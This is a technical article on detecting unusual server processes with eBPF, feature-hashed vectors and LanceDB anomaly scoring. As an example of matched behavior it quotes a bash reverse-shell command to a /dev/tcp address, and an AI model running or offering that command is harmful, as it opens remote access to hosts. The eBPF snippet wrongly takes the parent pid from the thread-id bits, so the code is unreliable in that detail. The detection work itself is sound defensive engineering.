Behavioral Process Telemetry: Zero-Configuration Anomaly Detection with eBPF and Embedded Vectors

Current Situation Analysis

Traditional host security relies on a fundamental assumption: you can define what malicious behavior looks like before it happens. Tools like Falco, OSSEC, and Wazuh operationalize this by shipping thousands of signature rules or YAML policies. A typical enterprise deployment ships with roughly 5,000 preconfigured rules. The operational reality is starkly different. These rulesets consistently miss approximately 50% of environment-specific anomalies because they only detect patterns that security researchers have already documented and encoded.

This approach creates three compounding problems:

Coverage gaps for novel behavior: A developer's ad-hoc debugging script, a forgotten CI/CD artifact, or a newly introduced deployment pattern will never trigger a rule that doesn't exist.
Maintenance debt: Every new service, framework update, or infrastructure change requires manual rule tuning. False positives accumulate, leading to alert fatigue and eventual rule suppression.
Scalability friction: At fleet scale, telemetry ingestion becomes expensive. Processing 3,000 process events per hour across a modest 50-node cluster requires either local neural embedding models (adding 200MB+ of weights and 5–20ms CPU latency per event) or external API calls (introducing network dependency and per-request costs).

The industry has largely accepted this trade-off: either maintain an ever-growing ruleset, or pay for heavy ML infrastructure. What's often overlooked is that security doesn't require understanding what "bad" looks like. It only requires understanding what "normal" looks like for a specific workload. Once a behavioral baseline is established, deviation becomes the signal. This shifts the operational model from reactive signature matching to proactive anomaly detection, eliminating manual rule authoring while maintaining deterministic, low-latency scoring.

WOW Moment: Key Findings

The architectural pivot from signature matching to behavioral vectorization fundamentally changes how telemetry scales and what it catches. The following comparison isolates the operational trade-offs across three common approaches:

Approach	Setup Time	Latency/Event	Infrastructure Cost	Novel Threat Detection	Maintenance Overhead
Rule-Based (YAML/Signatures)	Days to weeks	<0.1ms	Low	Poor (known patterns only)	High (constant tuning)
Neural Embeddings (Local/API)	Hours	5–20ms (local) / 100ms+ (API)	High (GPU/CPU or API fees)	Good (semantic similarity)	Medium (model versioning)
Feature-Hashed Vectors	Minutes	<0.1ms	Near-zero (embedded)	Strong (structural deviation)	Low (auto-baselining)

Why this matters: Feature-hashed behavioral vectors eliminate the cold-start problem of rule authoring and the infrastructure drag of neural models. By converting process telemetry into fixed-dimensional vectors and measuring cosine distance against a rolling baseline, you achieve deterministic anomaly scoring with zero external dependencies. The system learns environment-specific normalcy automatically, flags structural deviations immediately, and scales linearly with fleet size without API rate limits or model weight management.

Core Solution

The implementation rests on four interconnected layers: kernel telemetry capture, deterministic vectorization, embedded storage with anomaly scoring, and semantic query routing. Each layer is designed for zero-infrastructure deployment and deterministic reproducibility.

Step 1: Kernel Telemetry Capture with eBPF and Fallback

Process execution events originate at the sys_enter_execve tracepoint. This fires before the new program image is loaded, providing a reliable interception point for command-line arguments, parent process context, and execution metadata.

Using the Aya framework in Rust, we attach a tracepoint program that extracts execution metadata and routes it to a userspace ring buffer. The implementation avoids complex BPF map management by leveraging per-CPU ring buffers for high-throughput, low-contention delivery.

// kernel/collector.rs
use aya_bpf::programs::TracePointContext;
use aya_bpf::helpers::bpf_get_current_pid_tgid;
use aya_bpf::helpers::bpf_get_current_comm;

#[repr(C)]
pub struct ExecSnapshot {
    pub pid: u32,
    pub ppid: u32,
    pub uid: u32,
    pub comm: [u8; 16],
    pub cmdline: [u8; 128],
    pub timestamp_ns: u64,
}

#[tracepoint(name = "sys_enter_execve")]
pub fn capture_exec(ctx: TracePointContext) -> Result<u32, i64> {
    let pid_tgid = bpf_get_current_pid_tgid();
    let pid = (pid_tgid >> 32) as u32;
    let ppid = (pid_tgid & 0xFFFFFFFF) as u32;
    
    let mut snap = ExecSnapshot {
        pid,
        ppid,
        uid: 0, // populated via bpf_get_current_uid_gid in production
        comm: [0; 16],
        cmdline: [0; 128],
        timestamp_ns: bpf_ktime_get_ns(),
    };

    if let Ok(comm_bytes) = bpf_get_current_comm() {
        snap.comm = comm_bytes;
    }

    // Read filename pointer from tracepoint args (simplified for brevity)
    // In production, use bpf_probe_read_kernel_str for safe string extraction
    
    emit_snapshot(&snap)?;
    Ok(0)
}

The userspace agent consumes the ring buffer, batches events, and transmits them to the backend telemetry pipeline. For environments running kernels older than 5.8 or lacking BTF (BPF Type Format) support, the agent gracefully degrades to polling /proc/[pid]/cmdline and /proc/[pid]/status at fixed intervals. This fallback sacrifices sub-millisecond precision but preserves behavioral telemetry continuity across heterogeneous fleets.

Architectural rationale: eBPF provides deterministic, low-overhead kernel visibility without modifying application binaries or injecting sidecars. The /proc fallback ensures baseline coverage isn't fragmented by kernel version constraints. Batching reduces network round-trips and aligns with backend ingestion patterns.

Step 2: Deterministic Vectorization via Feature Hashing

Raw telemetry strings cannot be compared directly. We convert each execution snapshot into a fixed-length numerical vector using feature hashing (the hashing trick). This approach tokenizes structured fields, maps tokens to vector indices via deterministic hashing, and accumulates signed contributions.

// telemetry/vectorizer.ts
import { createHash } from 'crypto';

const VECTOR_DIM = 128;
const TOKEN_SEPARATOR = '|';

interface TelemetrySnapshot {
  processName: string;
  parentProcess: string;
  uid: number;
  localPort?: number;
  remotePort?: number;
  commandLine: string;
}

function tokenize(input: string): string[] {
  return input
    .toLowerCase()
    .split(/[\s\/\-\.\:]+/)
    .filter(t => t.length > 0);
}

function deterministicHash(token: string, salt: number): number {
  const h = createHash('sha256')
    .update(`${token}:${salt}`)
    .digest('hex');
  return parseInt(h.slice(0, 8), 16);
}

export function buildBehavioralVector(event: TelemetrySnapshot): Float32Array {
  const vec = new Float32Array(VECTOR_DIM);
  
  const fields = [
    event.processName,
    event.parentProcess,
    String(event.uid),
    String(event.localPort ?? 0),
    String(event.remotePort ?? 0),
    ...tokenize(event.commandLine)
  ];

  for (let i = 0; i < fields.length; i++) {
    const token = fields[i].trim();
    if (!token) continue;
    
    const idx = deterministicHash(token, i * 31) % VECTOR_DIM;
    const sign = (deterministicHash(token, i * 31 + 1) & 1) ? 1 : -1;
    vec[idx] += sign;
  }

  // L2 normalization for stable cosine distance calculations
  let magnitude = 0;
  for (let i = 0; i < VECTOR_DIM; i++) {
    magnitude += vec[i] ** 2;
  }
  magnitude = Math.sqrt(magnitude) || 1;
  
  for (let i = 0; i < VECTOR_DIM; i++) {
    vec[i] /= magnitude;
  }

  return vec;
}

Why feature hashing over neural embeddings? Neural models like all-MiniLM-L6-v2 or text-embedding-3-small capture semantic relationships (e.g., sh and bash are both shells). However, they introduce operational friction: local inference requires 200MB+ weights and 5–20ms CPU time per event, while external APIs add network latency, per-token costs, and single points of failure. Feature hashing runs in <0.1ms, requires zero dependencies, and produces identical vectors for identical inputs. For structured telemetry where token overlap strongly correlates with behavioral similarity, hashing delivers sufficient discriminative power without infrastructure overhead. The vectorization layer is isolated behind a single interface, allowing future migration to neural embeddings without touching scoring or storage logic.

Step 3: Embedded Storage and Anomaly Scoring

We use LanceDB, an embedded vector database that operates in-process and persists data to disk. Each workload receives an isolated table. New events are vectorized, compared against the 10 nearest historical neighbors, scored via cosine distance, and appended to the baseline.

// telemetry/scorer.ts
import { cosineSimilarity } from './math-utils';

interface BaselineRow {
  vector: Float32Array;
  recordedAt: number;
}

export async function evaluateAnomaly(
  orgId: string,
  workload: string,
  event: TelemetrySnapshot
): Promise<{ score: number; isNew: boolean }> {
  const table = await getOrCreateWorkloadTable(orgId, workload);
  const vec = buildBehavioralVector(event);
  
  // Retrieve k=10 nearest historical executions
  const neighbors = await table.search(vec).limit(10).toArray();
  
  let anomalyScore = 1.0; // Maximum deviation by default
  
  if (neighbors.length > 0) {
    const distances = neighbors.map(n => 
      1 - cosineSimilarity(vec, n.vector)
    );
    const minDistance = Math.min(...distances);
    // Scale to 0-1 range where 0 = identical, 1 = completely novel
    anomalyScore = Math.min(1.0, minDistance * 2);
  }
  
  // Persist to baseline for future comparisons
  await table.add([{
    vector: Array.from(vec),
    recordedAt: Date.now()
  }]);
  
  // Prune entries older than 7 days to prevent baseline stagnation
  await table.delete({ recordedAt: { $lt: Date.now() - 7 * 24 * 60 * 60 * 1000 } });
  
  return { score: anomalyScore, isNew: anomalyScore > 0.8 };
}

The anomaly score ranges from 0 (frequently observed behavior) to 1 (structurally novel execution). Scores are persisted to ClickHouse alongside raw telemetry for downstream alerting, dashboarding, and forensic querying. Temporal pruning ensures the baseline adapts to legitimate infrastructure changes without accumulating stale noise.

Step 4: Semantic Query Interface

Once telemetry is vectorized, natural language queries become nearest-neighbor searches. The same feature hashing pipeline converts a search string into a query vector, which is then compared against workload tables.

// api/search.ts
app.post('/security/search', async (req, res) => {
  const { query, orgId, workload } = req.body;
  const queryVec = buildBehavioralVector({
    processName: query,
    parentProcess: '',
    uid: 0,
    commandLine: query
  } as TelemetrySnapshot);
  
  const results = await getOrCreateWorkloadTable(orgId, workload)
    .search(queryVec)
    .limit(20)
    .toArray();
    
  res.json({ matches: results.map(r => ({
    score: 1 - cosineSimilarity(queryVec, r.vector),
    timestamp: r.recordedAt
  }))});
});

A query like reverse shell bash outbound connection will match executions containing bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 because the token sets overlap significantly in the hashed vector space. This eliminates keyword matching limitations and surfaces structurally similar behavior regardless of exact phrasing.

Pitfall Guide

1. Ignoring BTF and Kernel Version Requirements

Explanation: eBPF programs compiled without BTF (BPF Type Format) will fail to load on kernels lacking CO-RE (Compile Once, Run Everywhere) support. Attempting to attach to sys_enter_execve on kernels <5.8 without fallback logic causes silent telemetry gaps. Fix: Always verify CONFIG_DEBUG_INFO_BTF=y and kernel version ≥5.8 before loading eBPF programs. Implement the /proc polling fallback and log the degradation path explicitly.

2. Vector Space Collision from Poor Tokenization

Explanation: Aggressive tokenization or ignoring delimiters causes unrelated commands to hash into identical vector indices. curl http://api.example.com and curl http://api.internal.local may collide if domain boundaries aren't preserved. Fix: Use structured delimiters (/, ., :, -) that preserve semantic boundaries. Apply minimum token length filters (≥3 characters) to discard noise like a, 1, or --.

3. Baseline Stagnation Without Temporal Decay

Explanation: Accumulating all historical events indefinitely causes the baseline to become a "fossilized" average. Legitimate infrastructure changes (framework upgrades, new deployment tools) are permanently flagged as anomalies because the old baseline dominates the nearest-neighbor search. Fix: Implement sliding window pruning (e.g., 7-day retention). Weight recent events higher during scoring if your workload undergoes frequent legitimate changes.

4. Cosine Distance Misuse Without Normalization

Explanation: Cosine similarity assumes unit vectors. Feeding unnormalized feature-hashed vectors produces skewed distances where high-magnitude vectors artificially dominate nearest-neighbor results. Fix: Always apply L2 normalization after feature hashing. Verify normalization in unit tests by asserting Math.sqrt(vec.reduce((s, v) => s + v**2, 0)) ≈ 1.

5. Over-Indexing on Single-Event Scores

Explanation: A single high anomaly score doesn't guarantee malicious intent. A first-run CI/CD script or a developer's ad-hoc diagnostic command will score 0.8–0.95 on initial execution but represent legitimate behavior. Fix: Implement temporal smoothing. Require consecutive high scores or correlate with execution frequency. Use score decay: effective_score = max(score, previous_score * 0.7) to allow legitimate novelty to normalize.

6. Missing Fallback for Containerized Environments

Explanation: eBPF programs attached at the host level may not capture process execution inside containers with isolated PID namespaces. Relying solely on host-level tracepoints creates blind spots in Kubernetes or Docker environments. Fix: Deploy the telemetry agent as a DaemonSet with hostPID: true and hostNetwork: true to observe container process execution from the host namespace. Validate coverage by cross-referencing with container runtime metrics.

7. Unbounded Vector Table Growth

Explanation: LanceDB tables grow linearly with event volume. Without pruning or compaction, disk I/O increases, search latency degrades, and memory pressure rises during vector scans. Fix: Enforce strict retention policies. Use LanceDB's built-in compaction for older segments. Monitor table row counts and trigger archival to cold storage (S3/GCS) when thresholds are exceeded.

Production Bundle

Action Checklist

Verify kernel version ≥5.8 and BTF support before deploying eBPF collector
Implement /proc fallback with explicit logging for legacy environments
Apply L2 normalization to all feature-hashed vectors before storage
Configure 7-day sliding window retention for baseline tables
Set initial anomaly threshold at 0.85 for production, 0.7 for dev
Cross-validate eBPF coverage against container runtime metrics
Implement temporal smoothing to prevent first-run false positives
Archive pruned baseline data to object storage for forensic retention

Decision Matrix

Scenario	Recommended Approach	Why	Cost Impact
Heterogeneous fleet (kernels 4.18–6.x)	eBPF + `/proc` fallback	Ensures 100% coverage without kernel upgrades	Low (agent handles degradation)
High-frequency workloads (>10k events/hr)	Feature hashing (128-dim)	Sub-millisecond vectorization, zero API dependency	Near-zero CPU/network
Semantic search accuracy critical	Neural embeddings (local)	Captures shell/script semantic similarity	High (GPU/CPU, 200MB+ weights)
Multi-tenant SaaS platform	LanceDB per-tenant isolation	Zero infrastructure, fast nearest-neighbor, easy backup	Low (embedded, disk-bound)
Compliance/audit requirements	ClickHouse + vector scores	Immutable storage, SQL querying, retention policies	Medium (managed ClickHouse)

Configuration Template

# telemetry-agent-config.yaml
agent:
  mode: auto  # auto, ebpf, proc
  batch_interval_ms: 60000
  max_batch_size: 500
  
ebpf:
  tracepoint: sys_enter_execve
  ring_buffer_pages: 64
  btf_required: true
  
vectorization:
  dimension: 128
  normalization: l2
  token_min_length: 3
  delimiters: [" ", "/", ".", ":", "-", "="]
  
storage:
  provider: lancedb
  retention_days: 7
  prune_interval_hours: 24
  path: /var/lib/telemetry/baselines
  
scoring:
  k_neighbors: 10
  distance_metric: cosine
  threshold_warn: 0.85
  threshold_critical: 0.95
  temporal_smoothing: true
  decay_factor: 0.7
  
backend:
  endpoint: https://telemetry.internal/v1/events
  auth_header: X-API-Key
  retry_max: 3
  timeout_ms: 5000

Quick Start Guide

Deploy the telemetry agent: Install the collector binary on target hosts. The agent auto-detects kernel capabilities and selects eBPF or /proc polling.
Initialize baseline tables: Run telemetry-agent init --org prod --workload web-frontend to create the first LanceDB table and ingest initial execution snapshots.
Configure scoring thresholds: Adjust threshold_warn and threshold_critical in the YAML config based on workload sensitivity. Production typically uses 0.85; development uses 0.7.
Validate vector coverage: Execute telemetry-agent validate --sample-size 100 to confirm L2 normalization, tokenization boundaries, and nearest-neighbor retrieval latency (<5ms).
Connect to analytics pipeline: Point the agent's backend endpoint to your ClickHouse cluster or telemetry aggregator. Query security_events table for anomaly_score > 0.8 to surface novel executions.

Detecting unusual processes on your servers without writing a single rule